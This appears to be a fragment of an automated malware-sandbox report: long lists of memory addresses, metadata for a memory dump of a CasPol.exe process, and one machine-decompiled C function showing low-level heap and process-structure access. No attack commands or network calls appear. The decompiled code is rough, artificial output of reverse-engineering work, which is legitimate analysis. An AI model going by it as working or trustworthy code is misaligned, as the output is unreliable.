                                                                                                                                                                                                                                                                                                0x01744226
                                                                                                                                                                                                                                                                                                0x0178e1f3
                                                                                                                                                                                                                                                                                                0x0178e1f3
                                                                                                                                                                                                                                                                                                0x0174422c
                                                                                                                                                                                                                                                                                                0x0174422c
                                                                                                                                                                                                                                                                                                0x01744233
                                                                                                                                                                                                                                                                                                0x0178e1ed
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744239
                                                                                                                                                                                                                                                                                                0x01744239
                                                                                                                                                                                                                                                                                                0x01744239
                                                                                                                                                                                                                                                                                                0x01744239
                                                                                                                                                                                                                                                                                                0x01744233
                                                                                                                                                                                                                                                                                                0x01744226
                                                                                                                                                                                                                                                                                                0x017441ee
                                                                                                                                                                                                                                                                                                0x017441ee
                                                                                                                                                                                                                                                                                                0x017441f4
                                                                                                                                                                                                                                                                                                0x01744575
                                                                                                                                                                                                                                                                                                0x0178e1b1
                                                                                                                                                                                                                                                                                                0x0178e1b1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174457b
                                                                                                                                                                                                                                                                                                0x0174457b
                                                                                                                                                                                                                                                                                                0x01744582
                                                                                                                                                                                                                                                                                                0x0178e1ab
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744588
                                                                                                                                                                                                                                                                                                0x01744588
                                                                                                                                                                                                                                                                                                0x0174458c
                                                                                                                                                                                                                                                                                                0x0178e1c4
                                                                                                                                                                                                                                                                                                0x0178e1c4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744592
                                                                                                                                                                                                                                                                                                0x01744592
                                                                                                                                                                                                                                                                                                0x01744599
                                                                                                                                                                                                                                                                                                0x0178e1be
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174459f
                                                                                                                                                                                                                                                                                                0x0174459f
                                                                                                                                                                                                                                                                                                0x017445a3
                                                                                                                                                                                                                                                                                                0x0178e1d7
                                                                                                                                                                                                                                                                                                0x0178e1e4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445a9
                                                                                                                                                                                                                                                                                                0x017445a9
                                                                                                                                                                                                                                                                                                0x017445b0
                                                                                                                                                                                                                                                                                                0x0178e1d1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445b6
                                                                                                                                                                                                                                                                                                0x017445b0
                                                                                                                                                                                                                                                                                                0x017445a3
                                                                                                                                                                                                                                                                                                0x01744599
                                                                                                                                                                                                                                                                                                0x0174458c
                                                                                                                                                                                                                                                                                                0x01744582
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441f4
                                                                                                                                                                                                                                                                                                0x0174423e
                                                                                                                                                                                                                                                                                                0x01744241
                                                                                                                                                                                                                                                                                                0x017445c0
                                                                                                                                                                                                                                                                                                0x017445c4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445ca
                                                                                                                                                                                                                                                                                                0x017445ca
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e207
                                                                                                                                                                                                                                                                                                0x0178e20f
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445d1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445ca
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744247
                                                                                                                                                                                                                                                                                                0x01744247
                                                                                                                                                                                                                                                                                                0x01744247
                                                                                                                                                                                                                                                                                                0x01744249
                                                                                                                                                                                                                                                                                                0x01744249
                                                                                                                                                                                                                                                                                                0x01744249
                                                                                                                                                                                                                                                                                                0x01744251
                                                                                                                                                                                                                                                                                                0x01744251
                                                                                                                                                                                                                                                                                                0x01744257
                                                                                                                                                                                                                                                                                                0x0174425f
                                                                                                                                                                                                                                                                                                0x0174426e
                                                                                                                                                                                                                                                                                                0x01744270
                                                                                                                                                                                                                                                                                                0x0174427a
                                                                                                                                                                                                                                                                                                0x0178e219
                                                                                                                                                                                                                                                                                                0x0178e219
                                                                                                                                                                                                                                                                                                0x01744280
                                                                                                                                                                                                                                                                                                0x01744282
                                                                                                                                                                                                                                                                                                0x01744456
                                                                                                                                                                                                                                                                                                0x017445ea
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017445f0
                                                                                                                                                                                                                                                                                                0x0178e223
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e223
                                                                                                                                                                                                                                                                                                0x0174445c
                                                                                                                                                                                                                                                                                                0x0174445c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174445c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744288
                                                                                                                                                                                                                                                                                                0x0174428c
                                                                                                                                                                                                                                                                                                0x0178e298
                                                                                                                                                                                                                                                                                                0x01744292
                                                                                                                                                                                                                                                                                                0x01744292
                                                                                                                                                                                                                                                                                                0x0174429e
                                                                                                                                                                                                                                                                                                0x017442a3
                                                                                                                                                                                                                                                                                                0x017442a7
                                                                                                                                                                                                                                                                                                0x017442ac
                                                                                                                                                                                                                                                                                                0x0178e22d
                                                                                                                                                                                                                                                                                                0x017442b2
                                                                                                                                                                                                                                                                                                0x017442b2
                                                                                                                                                                                                                                                                                                0x017442b9
                                                                                                                                                                                                                                                                                                0x017442bc
                                                                                                                                                                                                                                                                                                0x017442c2
                                                                                                                                                                                                                                                                                                0x017442ca
                                                                                                                                                                                                                                                                                                0x017442cd
                                                                                                                                                                                                                                                                                                0x017442cd
                                                                                                                                                                                                                                                                                                0x017442d4
                                                                                                                                                                                                                                                                                                0x0174433f
                                                                                                                                                                                                                                                                                                0x0174433f
                                                                                                                                                                                                                                                                                                0x017442d6
                                                                                                                                                                                                                                                                                                0x017442d6
                                                                                                                                                                                                                                                                                                0x017442d9
                                                                                                                                                                                                                                                                                                0x017442dd
                                                                                                                                                                                                                                                                                                0x017442eb
                                                                                                                                                                                                                                                                                                0x0178e23a
                                                                                                                                                                                                                                                                                                0x017442f1
                                                                                                                                                                                                                                                                                                0x01744305
                                                                                                                                                                                                                                                                                                0x0174430d
                                                                                                                                                                                                                                                                                                0x01744315
                                                                                                                                                                                                                                                                                                0x01744318
                                                                                                                                                                                                                                                                                                0x0174431f
                                                                                                                                                                                                                                                                                                0x01744322
                                                                                                                                                                                                                                                                                                0x0174432e
                                                                                                                                                                                                                                                                                                0x0174433b
                                                                                                                                                                                                                                                                                                0x0174433b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174432e
                                                                                                                                                                                                                                                                                                0x017442eb
                                                                                                                                                                                                                                                                                                0x0174434c
                                                                                                                                                                                                                                                                                                0x0174434e
                                                                                                                                                                                                                                                                                                0x01744352
                                                                                                                                                                                                                                                                                                0x01744359
                                                                                                                                                                                                                                                                                                0x0174435e
                                                                                                                                                                                                                                                                                                0x01744361
                                                                                                                                                                                                                                                                                                0x0174436e
                                                                                                                                                                                                                                                                                                0x0174438a
                                                                                                                                                                                                                                                                                                0x0174438e
                                                                                                                                                                                                                                                                                                0x01744396
                                                                                                                                                                                                                                                                                                0x0174439e
                                                                                                                                                                                                                                                                                                0x017443a1
                                                                                                                                                                                                                                                                                                0x017443ad
                                                                                                                                                                                                                                                                                                0x017443bb
                                                                                                                                                                                                                                                                                                0x017443bb
                                                                                                                                                                                                                                                                                                0x017443ad
                                                                                                                                                                                                                                                                                                0x0174436e
                                                                                                                                                                                                                                                                                                0x017443bf
                                                                                                                                                                                                                                                                                                0x017443c5
                                                                                                                                                                                                                                                                                                0x01744463
                                                                                                                                                                                                                                                                                                0x01744463
                                                                                                                                                                                                                                                                                                0x017443ce
                                                                                                                                                                                                                                                                                                0x017443d5
                                                                                                                                                                                                                                                                                                0x017443d9
                                                                                                                                                                                                                                                                                                0x017443df
                                                                                                                                                                                                                                                                                                0x01744475
                                                                                                                                                                                                                                                                                                0x01744479
                                                                                                                                                                                                                                                                                                0x01744491
                                                                                                                                                                                                                                                                                                0x01744491
                                                                                                                                                                                                                                                                                                0x01744479
                                                                                                                                                                                                                                                                                                0x017443e5
                                                                                                                                                                                                                                                                                                0x017443eb
                                                                                                                                                                                                                                                                                                0x017443f4
                                                                                                                                                                                                                                                                                                0x017443f6
                                                                                                                                                                                                                                                                                                0x017443f9
                                                                                                                                                                                                                                                                                                0x017443fc
                                                                                                                                                                                                                                                                                                0x017443ff
                                                                                                                                                                                                                                                                                                0x017444e8
                                                                                                                                                                                                                                                                                                0x017444ed
                                                                                                                                                                                                                                                                                                0x017444f3
                                                                                                                                                                                                                                                                                                0x0178e247
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017444f9
                                                                                                                                                                                                                                                                                                0x01744504
                                                                                                                                                                                                                                                                                                0x01744508
                                                                                                                                                                                                                                                                                                0x0174450f
                                                                                                                                                                                                                                                                                                0x0178e269
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01744515
                                                                                                                                                                                                                                                                                                0x01744519
                                                                                                                                                                                                                                                                                                0x01744531
                                                                                                                                                                                                                                                                                                0x01744534
                                                                                                                                                                                                                                                                                                0x01744537
                                                                                                                                                                                                                                                                                                0x0174453e
                                                                                                                                                                                                                                                                                                0x01744541
                                                                                                                                                                                                                                                                                                0x0174454a
                                                                                                                                                                                                                                                                                                0x0178e255
                                                                                                                                                                                                                                                                                                0x0178e255
                                                                                                                                                                                                                                                                                                0x0178e25b
                                                                                                                                                                                                                                                                                                0x0178e25e
                                                                                                                                                                                                                                                                                                0x0178e261
                                                                                                                                                                                                                                                                                                0x0178e261
                                                                                                                                                                                                                                                                                                0x01744555
                                                                                                                                                                                                                                                                                                0x01744559
                                                                                                                                                                                                                                                                                                0x0174455d
                                                                                                                                                                                                                                                                                                0x0178e26d
                                                                                                                                                                                                                                                                                                0x0178e270
                                                                                                                                                                                                                                                                                                0x0178e274
                                                                                                                                                                                                                                                                                                0x0178e27a
                                                                                                                                                                                                                                                                                                0x0178e27d
                                                                                                                                                                                                                                                                                                0x0178e28e
                                                                                                                                                                                                                                                                                                0x0178e28e
                                                                                                                                                                                                                                                                                                0x01744563
                                                                                                                                                                                                                                                                                                0x01744563
                                                                                                                                                                                                                                                                                                0x01744569
                                                                                                                                                                                                                                                                                                0x01744569
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174455d
                                                                                                                                                                                                                                                                                                0x0174450f
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017444f3
                                                                                                                                                                                                                                                                                                0x017443ff
                                                                                                                                                                                                                                                                                                0x01744405
                                                                                                                                                                                                                                                                                                0x01744405
                                                                                                                                                                                                                                                                                                0x01744405
                                                                                                                                                                                                                                                                                                0x017442ac
                                                                                                                                                                                                                                                                                                0x0174428c
                                                                                                                                                                                                                                                                                                0x01744282
                                                                                                                                                                                                                                                                                                0x01744407
                                                                                                                                                                                                                                                                                                0x0174440d
                                                                                                                                                                                                                                                                                                0x0178e2af
                                                                                                                                                                                                                                                                                                0x0178e2af
                                                                                                                                                                                                                                                                                                0x01744413
                                                                                                                                                                                                                                                                                                0x01744413
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441d4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017441c3
                                                                                                                                                                                                                                                                                                0x017441bd
                                                                                                                                                                                                                                                                                                0x01744415
                                                                                                                                                                                                                                                                                                0x01744415
                                                                                                                                                                                                                                                                                                0x01744416
                                                                                                                                                                                                                                                                                                0x01744417
                                                                                                                                                                                                                                                                                                0x01744429
                                                                                                                                                                                                                                                                                                0x0174416e
                                                                                                                                                                                                                                                                                                0x0174416e
                                                                                                                                                                                                                                                                                                0x01744175
                                                                                                                                                                                                                                                                                                0x01744498
                                                                                                                                                                                                                                                                                                0x0174449f
                                                                                                                                                                                                                                                                                                0x0178e12d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e133
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178e133
                                                                                                                                                                                                                                                                                                0x017444a5
                                                                                                                                                                                                                                                                                                0x017444a5
                                                                                                                                                                                                                                                                                                0x017444aa
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017444bb
                                                                                                                                                                                                                                                                                                0x017444ca
                                                                                                                                                                                                                                                                                                0x017444d6
                                                                                                                                                                                                                                                                                                0x017444d7
                                                                                                                                                                                                                                                                                                0x017444d8
                                                                                                                                                                                                                                                                                                0x017444e3
                                                                                                                                                                                                                                                                                                0x017444e3
                                                                                                                                                                                                                                                                                                0x017444aa
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174417b
                                                                                                                                                                                                                                                                                                0x01744175
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ee4ec166f3dbe7e3be51b5c01c9c00c908fd83f8d036610aa35cfe5e09604c90
                                                                                                                                                                                                                                                                                                • Instruction ID: 6b408ba1e9faeb6925d0b8fa8b018498b0f0f5c461c853689eade5bcd2ef4999
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee4ec166f3dbe7e3be51b5c01c9c00c908fd83f8d036610aa35cfe5e09604c90
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5F179706082118BD724DF29C484B7AFBE1BF98714F14896EF986CB291EB34D981DB52
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0175513A Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                                			E0175513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x181d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0176D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01742280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01744620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0176F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L0173FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x181b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L0176B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                                                                                                                                                                                                                0x01755142
                                                                                                                                                                                                                                                                                                0x0175514c
                                                                                                                                                                                                                                                                                                0x01755150
                                                                                                                                                                                                                                                                                                0x01755157
                                                                                                                                                                                                                                                                                                0x01755159
                                                                                                                                                                                                                                                                                                0x0175515e
                                                                                                                                                                                                                                                                                                0x01755165
                                                                                                                                                                                                                                                                                                0x01755169
                                                                                                                                                                                                                                                                                                0x0175516c
                                                                                                                                                                                                                                                                                                0x01755172
                                                                                                                                                                                                                                                                                                0x01755176
                                                                                                                                                                                                                                                                                                0x0175517a
                                                                                                                                                                                                                                                                                                0x0175517a
                                                                                                                                                                                                                                                                                                0x0175517a
                                                                                                                                                                                                                                                                                                0x0175517f
                                                                                                                                                                                                                                                                                                0x01796d8b
                                                                                                                                                                                                                                                                                                0x01796d8e
                                                                                                                                                                                                                                                                                                0x01796d91
                                                                                                                                                                                                                                                                                                0x01796d95
                                                                                                                                                                                                                                                                                                0x01796d98
                                                                                                                                                                                                                                                                                                0x01796d9c
                                                                                                                                                                                                                                                                                                0x01796da0
                                                                                                                                                                                                                                                                                                0x01796da3
                                                                                                                                                                                                                                                                                                0x01796da7
                                                                                                                                                                                                                                                                                                0x01796e26
                                                                                                                                                                                                                                                                                                0x01796e26
                                                                                                                                                                                                                                                                                                0x01796e2a
                                                                                                                                                                                                                                                                                                0x017551f9
                                                                                                                                                                                                                                                                                                0x017551f9
                                                                                                                                                                                                                                                                                                0x017551fe
                                                                                                                                                                                                                                                                                                0x01796e33
                                                                                                                                                                                                                                                                                                0x01796e33
                                                                                                                                                                                                                                                                                                0x01796e39
                                                                                                                                                                                                                                                                                                0x01796e3d
                                                                                                                                                                                                                                                                                                0x01796e46
                                                                                                                                                                                                                                                                                                0x01796e50
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796e52
                                                                                                                                                                                                                                                                                                0x01796e53
                                                                                                                                                                                                                                                                                                0x01796e56
                                                                                                                                                                                                                                                                                                0x01796e5d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796e5f
                                                                                                                                                                                                                                                                                                0x01796e67
                                                                                                                                                                                                                                                                                                0x01796e77
                                                                                                                                                                                                                                                                                                0x01796e7f
                                                                                                                                                                                                                                                                                                0x01796e80
                                                                                                                                                                                                                                                                                                0x01796e88
                                                                                                                                                                                                                                                                                                0x01796e90
                                                                                                                                                                                                                                                                                                0x01796e9f
                                                                                                                                                                                                                                                                                                0x01796ea5
                                                                                                                                                                                                                                                                                                0x01796ea9
                                                                                                                                                                                                                                                                                                0x01796eb1
                                                                                                                                                                                                                                                                                                0x01796ebf
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796ecf
                                                                                                                                                                                                                                                                                                0x01796ed3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796edb
                                                                                                                                                                                                                                                                                                0x01796ede
                                                                                                                                                                                                                                                                                                0x01796ee1
                                                                                                                                                                                                                                                                                                0x01796ee8
                                                                                                                                                                                                                                                                                                0x01796eeb
                                                                                                                                                                                                                                                                                                0x01796eed
                                                                                                                                                                                                                                                                                                0x01796ef0
                                                                                                                                                                                                                                                                                                0x01796ef4
                                                                                                                                                                                                                                                                                                0x01796ef8
                                                                                                                                                                                                                                                                                                0x01796efc
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796f0d
                                                                                                                                                                                                                                                                                                0x01796f11
                                                                                                                                                                                                                                                                                                0x01796f32
                                                                                                                                                                                                                                                                                                0x01796f37
                                                                                                                                                                                                                                                                                                0x01796f3b
                                                                                                                                                                                                                                                                                                0x01796f3e
                                                                                                                                                                                                                                                                                                0x01796f41
                                                                                                                                                                                                                                                                                                0x01796f46
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796f4c
                                                                                                                                                                                                                                                                                                0x01796f50
                                                                                                                                                                                                                                                                                                0x01796f50
                                                                                                                                                                                                                                                                                                0x01796f54
                                                                                                                                                                                                                                                                                                0x01796f62
                                                                                                                                                                                                                                                                                                0x01796f65
                                                                                                                                                                                                                                                                                                0x01796f6d
                                                                                                                                                                                                                                                                                                0x01796f7b
                                                                                                                                                                                                                                                                                                0x01796f7b
                                                                                                                                                                                                                                                                                                0x01796f93
                                                                                                                                                                                                                                                                                                0x01796f98
                                                                                                                                                                                                                                                                                                0x01796fa0
                                                                                                                                                                                                                                                                                                0x01796fa6
                                                                                                                                                                                                                                                                                                0x01796fb3
                                                                                                                                                                                                                                                                                                0x01796fb6
                                                                                                                                                                                                                                                                                                0x01796fbf
                                                                                                                                                                                                                                                                                                0x01796fc1
                                                                                                                                                                                                                                                                                                0x01796fd5
                                                                                                                                                                                                                                                                                                0x01796fda
                                                                                                                                                                                                                                                                                                0x01796fda
                                                                                                                                                                                                                                                                                                0x01796fdd
                                                                                                                                                                                                                                                                                                0x01796fe2
                                                                                                                                                                                                                                                                                                0x01796fe7
                                                                                                                                                                                                                                                                                                0x01796feb
                                                                                                                                                                                                                                                                                                0x01796fef
                                                                                                                                                                                                                                                                                                0x01796ff3
                                                                                                                                                                                                                                                                                                0x0175520c
                                                                                                                                                                                                                                                                                                0x0175520c
                                                                                                                                                                                                                                                                                                0x0175520f
                                                                                                                                                                                                                                                                                                0x01755215
                                                                                                                                                                                                                                                                                                0x01755234
                                                                                                                                                                                                                                                                                                0x0175523a
                                                                                                                                                                                                                                                                                                0x0175523a
                                                                                                                                                                                                                                                                                                0x01755244
                                                                                                                                                                                                                                                                                                0x01755245
                                                                                                                                                                                                                                                                                                0x01755246
                                                                                                                                                                                                                                                                                                0x01755251
                                                                                                                                                                                                                                                                                                0x01755251
                                                                                                                                                                                                                                                                                                0x01796f13
                                                                                                                                                                                                                                                                                                0x01796f17
                                                                                                                                                                                                                                                                                                0x01796f17
                                                                                                                                                                                                                                                                                                0x01796f18
                                                                                                                                                                                                                                                                                                0x01796f1b
                                                                                                                                                                                                                                                                                                0x01796f1f
